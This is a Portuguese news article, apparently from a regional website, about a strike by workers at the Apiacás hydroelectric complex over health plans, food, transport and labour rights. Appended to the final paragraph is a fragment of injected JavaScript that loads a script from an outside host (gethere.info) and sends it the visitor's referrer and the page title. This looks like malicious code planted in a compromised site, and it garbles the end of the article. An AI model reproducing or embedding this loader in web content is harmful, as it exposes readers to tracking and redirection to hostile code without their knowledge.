Capa / Cidades / Usineiros da Quebec deflagram greve com pauta extensa

Usineiros da Quebec deflagram greve com pauta extensa

KODAK Digital Still Camera

Representantes dos usineiros, que atuam no complexo Hidrelétrico Apiacás, sob responsabilidade da construtora Quebec Engenharia, procuraram o Ministério Público do Trabalho em Alta Floresta para informar legalmente a paralisação que teve início na última quarta-feira (25). Os funcionários reivindicam melhorias nas questões de telefonia; internet; plano de saúde; qualidade na alimentação; direitos trabalhistas; questões de insalubridades; melhoria no transporte entre outras.

A obra conta atualmente com cerca de 1.700 funcionários, segundo informações repassadas pelos lideres da greve Sidione Ferreira Alves (Maranhão), Leomar de Souza Oliveira (Maranhão) e Josimar Souza Gomes (Bahia), que vieram nesta segunda-feira a Alta Floresta para serem atendidos pelo Ministério Público. Com a greve todos os serviços foram paralisados. Reunidos em frente ao portão da usina, os grevistas permitem apenas a entrada e saída de pessoas, de alimentos e caminhões câmaras frias, já os caminhões de materiais se aglomeram na entrada da usina.

Segundo os lideres do movimento para o retorno dos trabalhos é pedido que seja atendido alguns direitos trabalhistas, “o básico seria, o plano de saúde, o seguro de vida, os principais também são os tickets de alimentação que seja igual aos das outras empresas, no caso o PLR, esses são os principais, as outras melhorias podem ser ajeitadas lá mesmo no canteiro”, afirmam os grevistas, que reclamam do que consideram falta de comunicação da empresa com os funcionários, “estamos aguardando uma contraproposta e ver se eles oferecem alguma coisa, aí a comissão geral vê se os demais aceitam o acordo e ai nós voltamos a trabalhar”, destacou Josimar.

O complexo de usinas esta localizado a cerca de 145 km de Alta Floresta e é administrado pela Enel Green Power. O complexo é composto por três usinas hidrelétricas e uma usina Fotovoltaíca. A PCH Cabeça de Boi, PCH da Fazenda e UHE Salto Apiacás quando estiver em funcionamento terão capacidade de gerar mais de 102 MW, o suficiente para atender 267 mil famílias.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top